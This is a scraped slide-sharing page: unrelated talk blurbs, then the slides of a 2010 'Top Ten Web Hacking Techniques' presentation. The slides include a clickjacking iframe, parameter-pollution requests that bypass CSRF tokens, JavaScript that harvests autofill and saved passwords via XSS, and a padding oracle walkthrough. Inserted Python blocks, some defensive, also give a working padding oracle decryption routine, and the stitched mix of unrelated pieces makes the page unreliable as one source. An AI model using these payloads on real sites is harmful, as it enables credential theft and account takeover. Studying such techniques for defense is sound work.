English-language slides presented at the 100% IA event held at Iguane Solutions' Paris offices on Tuesday 2 July 2024:
- Presentation of our plug-and-play AI platform: its advanced features, such as its intuitive user interface, its powerful copilot and its high-performance monitoring tools.
- Customer case study: Cyril Janssens, CTO of easybourse, shares his experience of using our plug & play AI platform.
Coordinate Systems in FME 101 - Webinar Slides (Safe Software)
If you’ve ever had to analyze a map or GPS data, chances are you’ve encountered and even worked with coordinate systems. As historical data continually updates through GPS, understanding coordinate systems is increasingly crucial. However, not everyone knows why they exist or how to effectively use them for data-driven insights.
During this webinar, you’ll learn exactly what coordinate systems are and how you can use FME to maintain and transform your data’s coordinate systems in an easy-to-digest way, accurately representing the geographical space that it exists within. During this webinar, you will have the chance to:
- Enhance Your Understanding: Gain a clear overview of what coordinate systems are and their value
- Learn Practical Applications: Why we need datums and projections, plus units between coordinate systems
- Maximize with FME: Understand how FME handles coordinate systems, including a brief summary of the 3 main reprojectors
- Custom Coordinate Systems: Learn how to work with FME and coordinate systems beyond what is natively supported
- Look Ahead: Gain insights into where FME is headed with coordinate systems in the future
Don’t miss the opportunity to improve the value you receive from your coordinate system data, ultimately allowing you to streamline your data analysis and maximize your time. See you there!
The Rise of Supernetwork Data Intensive Computing (Larry Smarr)
Invited Remote Lecture to SC21
The International Conference for High Performance Computing, Networking, Storage, and Analysis
St. Louis, Missouri
November 18, 2021
Blockchain technology is transforming industries and reshaping the way we conduct business, manage data, and secure transactions. Whether you're new to blockchain or looking to deepen your knowledge, our guidebook, "Blockchain for Dummies", is your ultimate resource.
Details of description part II: Describing images in practice - Tech Forum 2024 (BookNet Canada)
This presentation explores the practical application of image description techniques. Familiar guidelines will be demonstrated in practice, and descriptions will be developed “live”! If you have learned a lot about the theory of image description techniques but want to feel more confident putting them into practice, this is the presentation for you. There will be useful, actionable information for everyone, whether you are working with authors, colleagues, alone, or leveraging AI as a collaborator.
Link to presentation recording and transcript: https://bnctechforum.ca/sessions/details-of-description-part-ii-describing-images-in-practice/
Presented by BookNet Canada on June 25, 2024, with support from the Department of Canadian Heritage.
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptx (SynapseIndia)
Your comprehensive guide to RPA in healthcare for 2024. Explore the benefits, use cases, and emerging trends of robotic process automation. Understand the challenges and prepare for the future of healthcare automation
Mitigating the Impact of State Management in Cloud Stream Processing Systems (ScyllaDB)
Stream processing is a crucial component of modern data infrastructure, but constructing an efficient and scalable stream processing system can be challenging. Decoupling compute and storage architecture has emerged as an effective solution to these challenges, but it can introduce high latency issues, especially when dealing with complex continuous queries that necessitate managing extra-large internal states.
In this talk, we focus on addressing the high latency issues associated with S3 storage in stream processing systems that employ a decoupled compute and storage architecture. We delve into the root causes of latency in this context and explore various techniques to minimize the impact of S3 latency on stream processing performance. Our proposed approach is to implement a tiered storage mechanism that leverages a blend of high-performance and low-cost storage tiers to reduce data movement between the compute and storage layers while maintaining efficient processing.
Throughout the talk, we will present experimental results that demonstrate the effectiveness of our approach in mitigating the impact of S3 latency on stream processing. By the end of the talk, attendees will have gained insights into how to optimize their stream processing systems for reduced latency and improved cost-efficiency.
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo... (Chris Swan)
Have you noticed the OpenSSF Scorecard badges on the official Dart and Flutter repos? It's Google's way of showing that they care about security. Practices such as pinning dependencies, branch protection, required reviews, continuous integration tests etc. are measured to provide a score and accompanying badge.
You can do the same for your projects, and this presentation will show you how, with an emphasis on the unique challenges that come up when working with Dart and Flutter.
The session will provide a walkthrough of the steps involved in securing a first repository, and then what it takes to repeat that process across an organization with multiple repos. It will also look at the ongoing maintenance involved once scorecards have been implemented, and how aspects of that maintenance can be better automated to minimize toil.
Best Practices for Effectively Running dbt in Airflow.pdf (Tatiana Al-Chueyr)
As a popular open-source library for analytics engineering, dbt is often used in combination with Airflow. Orchestrating and executing dbt models as DAGs ensures an additional layer of control over tasks, observability, and provides a reliable, scalable environment to run dbt models.
This webinar will cover a step-by-step guide to Cosmos, an open source package from Astronomer that helps you easily run your dbt Core projects as Airflow DAGs and Task Groups, all with just a few lines of code. We’ll walk through:
- Standard ways of running dbt (and when to utilize other methods)
- How Cosmos can be used to run and visualize your dbt projects in Airflow
- Common challenges and how to address them, including performance, dependency conflicts, and more
- How running dbt projects in Airflow helps with cost optimization
Webinar given on 9 July 2024
INDIAN AIR FORCE FIGHTER PLANES LIST.pdf (jackson110191)
These fighter aircraft have uses outside of traditional combat situations. They are essential in defending India's territorial integrity, averting dangers, and delivering aid to those in need during natural calamities. Additionally, the IAF improves its interoperability and fortifies international military alliances by working together and conducting joint exercises with other air forces.
4. 400+ enterprise customers
•Start-ups to Fortune 500
Flagship offering “WhiteHat Sentinel Service”
•1000’s of assessments performed annually
Recognized leader in website security
•Quoted thousands of times by the mainstream press
5. About the Top Ten
“Every year the Web security community produces a stunning
amount of new hacking techniques published in various white
papers, blog posts, magazine articles, mailing list emails, etc. Within
the thousands of pages are the latest ways to attack websites, Web
browsers, Web proxies, and so on. Beyond individual vulnerability
instances with CVE numbers or system compromises, we're talking
about brand new and creative methods of Web-based attack.”
6. New Techniques
2009 (80)
Creating a rogue CA certificate
2008 (70)
GIFAR (GIF + JAR)
2007 (83)
XSS Vulnerabilities in Common Shockwave Flash Files
2006 (65)
Web Browser Intranet Hacking / Port Scanning
7. 2010
69 new techniques
1) 'Padding Oracle' Crypto Attack
2) Evercookie
3) Hacking Auto-Complete
4) Attacking HTTPS with Cache Injection
5) Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution
6) Universal XSS in IE8
7) HTTP POST DoS
8) JavaSnoop
9) CSS History Hack In Firefox Without JavaScript for Intranet Portscanning
10) Java Applet DNS Rebinding
http://jeremiahgrossman.blogspot.com/2011/01/top-ten-web-hacking-techniques-of-2010.html
8. Bypassing CSRF with Clickjacking and HTTP Parameter Pollution (#5)
Clickjacking is when an attacker invisibly hovers an object (button, link, etc.) below a user's mouse. When the user clicks on something they visually see, they're instead really clicking on something the attacker wanted them to. HTTP Parameter Pollution is where an attacker submits multiple input parameters (query string, post data, cookies, etc.) with the same name. Upon receipt, applications may react in unexpected ways and open up avenues of server-side and client-side exploitation. By cleverly leveraging these two former Top Ten attacks, CSRF attacks can be carried out against a user even when recommended token defenses are in use.
Lavakumar Kuppan (@lavakumark)
http://blog.andlabs.org/2010/03/bypassing-csrf-protections-with.html
9. Clickjacking (Top Ten 2009)
Think of any button – image, link, form, etc. – on any website – that can appear between the Web browser walls. This includes wire transfer on banks, DSL router buttons, Digg buttons, CPC advertising banners, Netflix queue.
Next consider that an attacker can invisibly hover these buttons below the user's mouse, so that when a user clicks on something they visually see, they're actually clicking on something the attacker wants them to.
What could the bad guy do with that ability?
10. Hover Invisible IFRAMEs
HTML, CSS, and JavaScript may size, follow the mouse and make transparent third-party IFRAME content.
<iframe
  src="http://victim/page.html"
  scrolling="no"
  frameborder="0"
  style="opacity:.1;filter:alpha(opacity=.1);-moz-opacity:.1;">
</iframe>
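As an added example that is not from the slides, a small Python check that tells, from a page's response headers, whether a browser would render it inside a frame from a given origin, which is what the technique above depends on. The header sets and URLs it is run against are constructed.

```python
from urllib.parse import urlsplit


def _origin(url):
    """Scheme + host[:port] of a URL, lower-cased, the way browsers compare origins."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()


def frame_ancestors_allows(source_list, page_url, framer_url):
    """Evaluate a CSP frame-ancestors source list for one framing origin.

    Handles 'none', 'self', full origins and host sources (with a *. prefix).
    Scheme-only sources such as https: are not modelled here (simplification).
    """
    page_origin = _origin(page_url)
    framer_origin = _origin(framer_url)
    framer_host = (urlsplit(framer_url).hostname or "").lower()
    for src in source_list.split():
        s = src.strip("'").lower()
        if s == "none":
            return False  # 'none' forbids every ancestor, whatever else is listed
        if s == "self":
            if framer_origin == page_origin:
                return True
        elif "://" in s:
            if s.rstrip("/") == framer_origin:
                return True
        elif s.startswith("*."):
            if framer_host.endswith(s[1:]):
                return True
        elif s == framer_host:
            return True
    return False


def can_be_framed_by(headers, page_url, framer_url):
    """True if a browser honouring these response headers would render page_url
    inside an <iframe> hosted on framer_url, i.e. the page is exposed to
    clickjacking from that origin.

    A Content-Security-Policy frame-ancestors directive wins over
    X-Frame-Options, as in current browsers. Only DENY and SAMEORIGIN are
    relied on; any other X-Frame-Options value (including the obsolete
    ALLOW-FROM) is treated as no protection.
    """
    h = {k.lower(): v for k, v in headers.items()}
    for directive in h.get("content-security-policy", "").split(";"):
        name, _, value = directive.strip().partition(" ")
        if name.lower() == "frame-ancestors":
            return frame_ancestors_allows(value, page_url, framer_url)
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return _origin(framer_url) == _origin(page_url)
    return True


if __name__ == "__main__":
    # Constructed sample: the victim page from the slide, framed from a third-party origin
    page = "http://victim/page.html"
    framer = "http://attacker.example/"
    for hdrs in ({}, {"X-Frame-Options": "DENY"},
                 {"Content-Security-Policy": "frame-ancestors 'self'"}):
        print(hdrs, "->", "framable" if can_be_framed_by(hdrs, page, framer) else "blocked")
```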
11. HTTP Parameter Pollution (HPP) - Top Ten 2009
If an attacker submits multiple input parameters (query string, post data, cookies, etc.) of the same name, the application may react in unexpected ways and open up new avenues of server-side and client-side exploitation.
GET /foo?par1=val1&par1=val2 HTTP/1.1
User-Agent: Mozilla/5.0
Host: Host
Accept: */*
POST /foo HTTP/1.1
User-Agent: Mozilla/5.0
Host: Host
Accept: */*
par1=val1&par1=val2
POST /index.aspx?par1=val1&par1=val2 HTTP/1.1
User-Agent: Mozilla/5.0
Host: Host
Cookie: par1=val3; par1=val4
Content-Length: 19
par1=val5&par1=val6
16. Simple parameter injection
// Vulnerable pattern (as on the slide): decoded parameter values are concatenated
// straight into the backend request body, so an encoded '&' or '=' inside a value
// becomes a delimiter when the backend parses the body again.
private void executeBackendRequest(HTTPRequest request) {
    String amount = request.getParameter("amount");
    String beneficiary = request.getParameter("recipient");
    HttpRequest("http://backend.com/servlet/actions", "POST",
        "action=transfer&amount=" + amount + "&recipient=" + beneficiary);
}
Malicious URL:
http://target.com/page?amount=1000&recipient=Jeremiah%26action%3dwithdraw
Translates to:
action=transfer&amount=1000&recipient=Jeremiah&action=withdraw
It is possible the attack could work if proper authorization controls are not in place and the application uses the last occurrence of the action parameter (IBM Lotus Domino, PHP / Apache, etc.)
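An added Python illustration, not from the slides, of why the injected recipient value above turns into a second action parameter at the backend, and of how re-encoding each value on the way out keeps it as a single value. The backend body strings are constructed from the slide's URL.

```python
from urllib.parse import parse_qsl, urlencode

# Constructed sample: the query string of the malicious URL on the slide
MALICIOUS_QUERY = "amount=1000&recipient=Jeremiah%26action%3dwithdraw"


def request_parameters(query_string):
    """Decode a query string the way a servlet container does before getParameter()."""
    return dict(parse_qsl(query_string, keep_blank_values=True))


def backend_body_vulnerable(params):
    """The slide's pattern: decoded values pasted into the backend body by string concatenation."""
    return "action=transfer&amount=" + params["amount"] + "&recipient=" + params["recipient"]


def backend_body_hardened(params):
    """Each value is re-encoded on the way out, so a decoded '&' or '=' cannot act as a delimiter."""
    return urlencode([("action", "transfer"),
                      ("amount", params["amount"]),
                      ("recipient", params["recipient"])])


def backend_view(body, policy="last"):
    """How a backend sees the body: duplicate names resolved by first or last occurrence,
    mirroring the per-platform behaviour the slide refers to."""
    seen = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        if policy == "last" or name not in seen:
            seen[name] = value
    return seen


def count_occurrences(body, name):
    """Number of times a parameter name appears in a form-encoded body."""
    return sum(1 for key, _ in parse_qsl(body, keep_blank_values=True) if key == name)


if __name__ == "__main__":
    params = request_parameters(MALICIOUS_QUERY)
    print("vulnerable body:", backend_body_vulnerable(params))
    print("backend (last wins):", backend_view(backend_body_vulnerable(params)))
    print("hardened body:", backend_body_hardened(params))
```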
17. Example Scenario
http://example/updateEmail.jsp
Client-Side
<form method="POST">
<input type="text" name="email" value="">
<input type="hidden" name="csrf-token" value="a0a0a0a0a0a">
</form>
Server-Side
if (req.parameter("email").isSet() && req.parameter("csrf-token").isValid()) {
// process the form and update the email ID
} else {
// display an empty form to the user (CSRF token included)
}
18. Bringing it all together
<iframe src="http://example/updateEmail.jsp?email=evil@attacker.com">
HTTP request via user submitted form via Clickjacking. The form was not filled out by the victim, meaning the email parameter in the POST body is blank. Now the QueryString contains the attacker entered value for the ‘email’ parameter.
POST /updateEmail.jsp?email=evil@attackermail.com HTTP/1.1
Host: www.example.com
email=&csrf-token=a0a0a0a0a0
When the server side JSP code calls req.parameter("email"), the value that is returned is the one in the QueryString (HPP first occurrence) and not the POST body. Since this value can be controlled by the attacker, he can trick the victim into updating his account with the attacker’s mail ID.
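The request handling from the HPP slide and the updateEmail.jsp scenario above, as an added Python example that is not from the slides: a parser for a raw request, the merged first-occurrence lookup the slide describes, and a hardened lookup that reads a state-changing POST's parameters from the body only and refuses any copy in the query string or any duplicate. The raw request, its headers and the token store are constructed.

```python
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: the request the victim's browser sends in the slide's scenario.
# The query string carries the attacker's email; the POST body (the real form) has it blank.
RAW_REQUEST = (
    "POST /updateEmail.jsp?email=evil@attackermail.com HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "email=&csrf-token=a0a0a0a0a0"
)

# Constructed: the tokens the server would accept for this session.
VALID_TOKENS = {"a0a0a0a0a0"}


class HppError(ValueError):
    """A parameter arrived in more than one place or more than once."""


def parse_raw_request(raw):
    """Split a raw HTTP/1.1 request into method, path, query pairs, body pairs and headers."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {
        "method": method,
        "path": parts.path,
        "query": parse_qsl(parts.query, keep_blank_values=True),
        "form": parse_qsl(body, keep_blank_values=True),
        "headers": headers,
    }


def first_occurrence(req, name):
    """Merged lookup, query string before body, first match wins: the
    req.parameter() behaviour the slide describes."""
    for key, value in req["query"] + req["form"]:
        if key == name:
            return value
    return None


def vulnerable_update_email(req):
    """The slide's server-side logic: the token check passes, but 'email' comes from the URL."""
    email = first_occurrence(req, "email")
    token = first_occurrence(req, "csrf-token")
    if email is not None and token in VALID_TOKENS:
        return ("updated", email)
    return ("form", None)


def body_only_param(req, name):
    """Hardened lookup: a state-changing POST reads its parameters from the body only;
    a copy in the query string or a duplicate in the body is a reason to refuse the request."""
    in_query = [v for k, v in req["query"] if k == name]
    in_body = [v for k, v in req["form"] if k == name]
    if in_query:
        raise HppError(f"'{name}' also supplied in the query string of a POST")
    if len(in_body) > 1:
        raise HppError(f"'{name}' supplied {len(in_body)} times in the body")
    return in_body[0] if in_body else None


def hardened_update_email(req):
    """Same form handler with the hardened lookup; returns ('rejected', reason) on pollution."""
    if req["method"] != "POST":
        return ("form", None)
    try:
        email = body_only_param(req, "email")
        token = body_only_param(req, "csrf-token")
    except HppError as err:
        return ("rejected", str(err))
    if email and token in VALID_TOKENS:
        return ("updated", email)
    return ("form", None)


if __name__ == "__main__":
    req = parse_raw_request(RAW_REQUEST)
    print("vulnerable:", vulnerable_update_email(req))
    print("hardened:  ", hardened_update_email(req))
```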
19. Attacking HTTPS with Cache Injection (#4)
No matter what type of encryption is used to defend a network, sooner or later the password, key, or certificate needs to be stored. If an attacker is able to tamper with the storage mechanism, even the strongest encryption mechanism can fail. The researchers demonstrated how to attack storage mechanisms by tampering with SSL sessions and break into Wifi networks using WPA. They also showed how to exploit SSL warning inconsistencies and caching mechanisms to trick the user into accepting bad certs and steal their username & password.
Elie Bursztein (@ELIE), Baptiste Gourdin (@bapt1ste), Dan Boneh
http://www.youtube.com/watch?v=bt0Qh9c59_c
http://elie.im/talks/bad-memories
20. RFC1918 Caching Security - (Top Ten 2009)
[Diagram: Victims on public Wifi (coffee shops, airplanes, corp guest networks) reach the Internet over HTTP; the Bad Guy runs Airpwn in between.]
• Victim(s) located on a RFC 1918 network with a Bad Guy
• Bad Guy may take the opportunity to read victim’s Web mail, steal creds, etc.
• Bad Guy man-in-the-middles HTTP (Airpwn) to inject IFRAMEs to RFC-1918 IPs
• MitM IFRAMEs to include JavaScript malware (BeEF). Or ...
• Inject JavaScript malware into popular Web widget URLs. (Ad servers, counters, etc.)
• Cache content in the browser for a really long time, beyond current session!
http://www.bindshell.net/tools/beef/
http://airpwn.sourceforge.net/Airpwn.html
21. Situation
• 43% of the Alexa top 100,000 use external javascript libraries
• Injecting a malicious javascript library into the browser cache allows the attacker to compromise a website protected by SSL
• The malicious library stays in the cache until the user clears it. Moving to a “safe” location doesn’t help
22. Impact
• One poisoned injection leads to multiple breaches
• Multiple websites share the same external library, such as Google Analytics
• Injecting a malicious version of one of these shared libraries allows the attacker to target all the websites that use it
23. Browser Defense -- sort of
• The only defense against cache injection is the SSL warning displayed by the browser when a bad certificate is supplied
• Corner cases allow an attacker to alter the way SSL certificate warnings are displayed
• These alterations make the caching attack effective, as the user is more likely to click through the tampered warning
24. Video Demo
• The following demos show how cache injection attacks work against Internet Explorer 8 and Firefox 3.6
• These demos were done in real time against real sites with their real certificates
25. Hacking Auto-Complete (#3)
This research encompasses a set of techniques where a malicious website may surreptitiously obtain its visitors' names, job titles, workplaces, physical addresses, telephone numbers, email addresses, usernames, passwords, search terms, social security numbers, credit card numbers, and on and on, by simulating JavaScript keystroke events in Web browsers' HTML form auto-complete / autofill functionality.
Jeremiah Grossman (@jeremiahg)
http://jeremiahgrossman.blogspot.com/2010/08/breaking-browsers-hacking-auto-complete.html
http://jeremiahgrossman.blogspot.com/2010/07/i-know-who-your-name-where-you-work-and.html
http://jeremiahgrossman.blogspot.com/2010/09/safari-autofill-hack-lives.html
http://jeremiahgrossman.blogspot.com/2010/07/in-firefox-we-cant-read-auto-complete.html
26. I want to know your name, who you work for, where you live, your email address, etc.
Right at the moment you visit a website. Even if you've never been there before, let alone entered information.
28. Address Card Autofill works even when you've NEVER entered personal data on ANY WEBSITE.
29. Demo
Step 1) Dynamically create input fields with the pre-set attribute names.
Step 2) Cycle through the alphabet initiating text events until a form value populates.
Step 3) Profit! -- Steal data with JavaScript. *transparency is even more fun!*
Safari v4 / v5

// 'input' is one of the dynamically created fields, 'char' the letter being tried
var event = document.createEvent('TextEvent');
event.initTextEvent('textInput', 1, 1, null, char);
input.value = "";
input.selectionStart = 0;
input.selectionEnd = 0;
input.focus();
input.dispatchEvent(event);

// give autofill a moment to react, then read back whatever it filled in
setTimeout(function() {
  if (input.value.length > 1) {
    // capture the value
  }
}, 500);
31. AutoComplete: User-supplied form values are shared across different websites by attribute "name". For example, email addresses entered into a field on website A populate the autofill for the same field name on websites B, C, D, etc.
<input type="text" name="email">
32. DEMO - Down, Down, Enter
// 'downs' is the number of down-arrow presses to send, 'time' the running delay in ms
// hit down arrow an incrementing number of times.
// separate with time to allow the GUI to keep pace
for (var i = 1; i <= downs; i++) {
  time += 30; // time padding
  keyStroke(this, 40, time); // down button
}
time += 15; // time padding
keyStroke(this, 13, time); // enter button

// initiate keystroke on a given object
function keyStroke(obj, code, t) {
  // create new event and fire (legacy Internet Explorer event model)
  var e = document.createEventObject();
  e.keyCode = code;
  setTimeout(function() { obj.fireEvent("onkeydown", e); }, t);
} // end keyStroke
Security Basis, and an Internet Explorer data stealer
http://webreflection.blogspot.com/2008/09/security-basis-and-internet-explorer.html
Andrea Giammarchi, Ajaxian Staff
33. Search terms
Credit card numbers and CCVs
Aliases
Contact information
Answers to secret questions
Usernames
Email addresses
...
34. AutoComplete is NOT enabled by default, but Internet Explorer asks the user if they would like to enable the feature after filling out a non-password form.
36. Saving Passwords
Many Web Browsers have “password managers,” which provide
a convenient way to save passwords on a “per website” basis.
<form method="post" action="/">
E-Mail: <input type="text" name="email"><br />
Password: <input type="password" name="pass"><br />
<input type="submit" value="Login">
</form>
37. If a website with a saved password is vulnerable to XSS, the payload can dynamically create login forms, which triggers the browser's password auto-complete feature. Since the payload is on the same domain, the username / password can be stolen.
function stealCreds() {
  var string = "E-Mail: " + document.getElementById("u").value;
  string += "\nPassword: " + document.getElementById("p").value;
  return string;
}
document.write('<form method="post" action="/">' +
  'E-Mail: <input id="u" type="text" name="email" value=""><br>' +
  'Password: <input id="p" type="password" name="password" value="">' +
  '</form>');
setTimeout('alert(stealCreds())', 2000);
DEMO
38. What to do...
Disable Auto-Complete in the Web browser
Remove persistent data
(History, Form Data, Cookies, LocalStorage, etc.)
NoScript (Firefox Extension), 1Password, etc.
<form autocomplete="off">
<input type="text" autocomplete="off" />
39. Evercookie (#2)
Evercookie is a JavaScript API that produces extremely persistent cookies in a browser. Its goal is to identify a client even after they've removed standard cookies, Flash cookies (Local Shared Objects or LSOs), and others. Evercookie accomplishes this by storing the cookie data in several types of storage mechanisms that are available in the local browser. Additionally, if evercookie finds that the user has removed any of the types of cookies in question, it recreates them using each mechanism available.
Samy Kamkar (@samykamkar)
http://samy.pl/evercookie/
41. Evercookies
1) Standard HTTP Cookies
2) Flash Cookies (LSOs)
3) Silverlight Isolated Storage
4) Storing cookies in RGB values of auto-generated, force-cached PNGs, using the HTML5 Canvas tag to read pixels (cookies) back out
5) Storing cookies in Web History
6) Internet Explorer userData storage
7) Storing cookies in Web cache
8) Storing cookies in HTTP ETags
9) HTML5 Session Storage
10) HTML5 Local Storage
11) HTML5 Global Storage
12) HTML5 Database Storage via SQLite
13) window.name caching
42. The API
• Persistent cookies via Javascript API
• Recreates after deletion
• Combines different storage mechanisms
• Easy to use!
var ec = new evercookie();
ec.set("uniqueid", "31337"); // set uniqueid = 31337
// get our evercookie data back
ec.get("uniqueid", function(val) { alert("ID is " + val) });
43. PNGs Cache
Cookie stored in RGB values of auto-generated, force-cached PNGs
using HTML5 Canvas Tag to read pixels back out
Pixel 0x0 = 0x4f5741 OWA
Pixel 0x1 = 0x535000 SP0
44. Killing Evercookies (Video)
1) Open a new tab, then close all other windows and tabs.
2) Delete Silverlight Isolated Storage
• Go to http://www.silverlight.net/
• Right click the Silverlight application (any app will do)
• Silverlight Preferences > Application Storage > Delete all...
• Click "Yes"
• * Optionally disable "Enable application storage"
3) Delete Flash Local Shared Objects (LSO)
• Go to the Flash "Website Storage Settings panel"
• Click "Delete all sites"
• Click "Confirm"
4) Clear Browsing Data
• Wrench > Tools > Clear Browsing Data...
• Select all options
• Clear data from this period: Everything
• Click "Clear Browsing data"
http://singe.za.net/blog/archives/1014-Killing-the-Evercookie.html
http://jeremiahgrossman.blogspot.com/2010/10/killing-evercookie-google-chrome-wo.html
45. Other Protections
• Nevercookie - The evercookie killer
Firefox plugin to extend Firefox’s Private Browsing
http://nevercookie.anonymizer.com/
• Use a virtual machine. (On your neighbor’s WiFi Network)
46. Other Worries...
• System/browser timing
• GPU timing via plugins/accelerators (w/Flash)
• MAC address accessible via Java or ActiveX!
47. 'Padding Oracle' Crypto Attack (#1)
In 2002 a powerful side-channel attack, the 'padding oracle' (NOT THE DATABASE!), was described targeting AES CBC-mode encryption with PKCS#5 padding. Given an oracle which, on receipt of a ciphertext, decrypts it and replies whether the padding is correct, the attack shows how to use that oracle to decrypt data without knowing the encryption key. The new techniques allow attackers to use a 'padding oracle' to decrypt and encrypt messages of any length without knowing the secret key, and to exploit popular web development frameworks including ASP.NET.
Juliano Rizzo (@julianor)
Thai Duong (@thaidn)
http://usenix.org/events/woot10/tech/full_papers/Rizzo.pdf
http://netifera.com/research/
http://www.gdssecurity.com/l/b/2010/09/14/automated-padding-oracle-attacks-with-padbuster/
http://www.youtube.com/watch?v=yghiC_U2RaM
http://threatpost.com/en_us/blogs/padding-oracle-crypto-attack-affects-millions-aspnet-apps-091310
49. Padding Oracle Attack Basics
An application uses a query string parameter to pass an encrypted username,
company id, and role id of a user. The parameter is encrypted using CBC mode,
and each value uses a unique initialization vector (IV) pre-pended to the ciphertext.
When the application is sent an encrypted value, it responds in one of three ways:
1) Valid ciphertext, properly padded and valid data (200 OK)
2) Invalid ciphertext, improper padding (500 Internal Server Error)
3) Valid ciphertext, properly padded and invalid data (200 OK - custom error)
User’s name (BRIAN), company id (12), and role id (2). The value, in plaintext, can
be represented as BRIAN;12;2;
http://site/app.jsp?UID=7B216A634951170FF851D6CC68FC9537858795A28ED4AAC6
52. First block of ciphertext pre-pended with an IV of all NULL values.
Request: http://site/app.jsp?UID=0000000000000000F851D6CC68FC9537
Response: 500 - Internal Server Error
53. Last byte of the initialization vector incremented by one.
Request: http://app/home.jsp?UID=0000000000000001F851D6CC68FC9537
Response: 500 - Internal Server Error
54. Incrementing the last byte in the IV up to FF will produce a valid padding sequence for a single byte of padding (0x01). Only one value will produce the correct padding byte and have a different response than the other 255.
Request: http://site/app?UID=000000000000003CF851D6CC68FC9537
Response: 200 OK
If [Intermediary Byte] ^ 0x3C == 0x01,
then [Intermediary Byte] == 0x3C ^ 0x01,
so [Intermediary Byte] == 0x3D
55. To crack the 7th byte, the 7th and 8th bytes must equal 0x02 for valid padding. Since we already know that the last intermediary value byte is 0x3D, we can update the 8th IV byte to 0x3F (which will produce 0x02) and then focus on brute forcing the 7th byte (starting with 0x00 and working our way up through 0xFF).
56. Work backwards through the entire block until every byte of the intermediary value is cracked, uncovering the decrypted value one byte at a time. The final byte is cracked using an IV that produces an entire block of just padding (0x08).
"The first stage of the attack takes a few thousand requests, but once it succeeds and the attacker gets the secret keys, it's totally stealthy. The cryptographic knowledge required is very basic."
- Juliano Rizzo
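The byte-at-a-time procedure of slides 52 through 56, worked through in code. This is an added example, not from the slides or from PadBuster: the 8-byte-block cipher is a constructed HMAC-based Feistel network standing in for the application's real cipher, and the key, IV and oracle function are assumptions. Unlike the slide's "only one value" shortcut, it also rules out the case where a guess for the last byte accidentally yields valid 0x02 0x02 padding.

```python
import hmac, hashlib
BLOCK = 8  # 8-byte blocks, like the 16-hex-char IV on the slides
xor = lambda a, b: bytes(x ^ y for x, y in zip(a, b))

def F(key, half, r):  # round function of a constructed Feistel cipher standing in for the app's real one
    return hmac.new(key, bytes([r]) + half, hashlib.sha256).digest()[:4]

def enc_block(key, b):
    l, r = b[:4], b[4:]
    for i in range(8):
        l, r = r, xor(l, F(key, r, i))
    return l + r

def dec_block(key, b):
    l, r = b[:4], b[4:]
    for i in reversed(range(8)):
        l, r = xor(r, F(key, l, i)), l
    return l + r

def pad(msg):  # PKCS#5: n bytes, each of value n
    n = BLOCK - len(msg) % BLOCK
    return msg + bytes([n]) * n

def cbc_encrypt(key, iv, msg):
    out = [iv]
    for i in range(0, len(msg), BLOCK):
        out.append(enc_block(key, xor(msg[i:i + BLOCK], out[-1])))
    return b"".join(out)

def make_oracle(key):  # the server: True (200 OK) iff the padding is valid, else False (500)
    def oracle(iv, c):
        p = xor(dec_block(key, c), iv)
        return 1 <= p[-1] <= BLOCK and p.endswith(p[-1:] * p[-1])
    return oracle

def crack_block(oracle, prev, c):
    inter = bytearray(BLOCK)  # the intermediary value D_k(c), recovered byte by byte
    for pos in range(BLOCK - 1, -1, -1):
        want = BLOCK - pos  # padding byte aimed for: 0x01, then 0x02, ... up to 0x08
        iv = bytearray(BLOCK)
        for k in range(pos + 1, BLOCK):
            iv[k] = inter[k] ^ want  # already-known bytes forced to the padding value
        for guess in range(256):
            iv[pos] = guess
            alt = bytearray(iv)
            alt[pos - 1] ^= 0xFF  # for the last byte, rules out an accidental 0x02 0x02 match
            if oracle(bytes(iv), c) and (pos < BLOCK - 1 or oracle(bytes(alt), c)):
                inter[pos] = guess ^ want
                break
    return xor(inter, prev)  # plaintext block = intermediary XOR previous ciphertext block
```

For a multi-block value, call crack_block once per block with the preceding ciphertext block (or the IV) as prev; the decrypt side never sees the key.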
57. [VIDEO]
"It turns out that the vulnerability in ASP.NET is the most critical amongst
other frameworks. In short, it totally destroys ASP.NET security,"
-Thai Duong
58. Impact & Prevention
Vulnerable Frameworks
ASP.Net, CAPTCHAs, JavaServer Faces, OWASP ESAPI,
Ruby On Rails, etc.
Prevention
• Encrypt-then-MAC (sign) and validate-then-decrypt
• Patch!
59. What have we learned?
• Encryption attacks took the top spot for the 2nd year in a row.
• Web Browser privacy? Web browser security? Not so much.
• “Top Ten” attacks from previous years are being improved.
• Several attack techniques from previous years are now
actively being used maliciously in the wild.
60. Thank You...
• Sponsors: OWASP, Black Hat, WhiteHat Security
• Panel of Experts: Ed Skoudis, Giorgio Maone, Caleb Sima, Chris Wysopal, Jeff Williams, Charlie Miller, Dan Kaminsky, Steven Christey (Mitre), and Arian Evans
• All the security researchers for their contributions
• Everyone in the Web Application Security community who assisted
Blog: http://jeremiahgrossman.blogspot.com/
Twitter: http://twitter.com/jeremiahg
Email: jeremiah@whitehatsec.com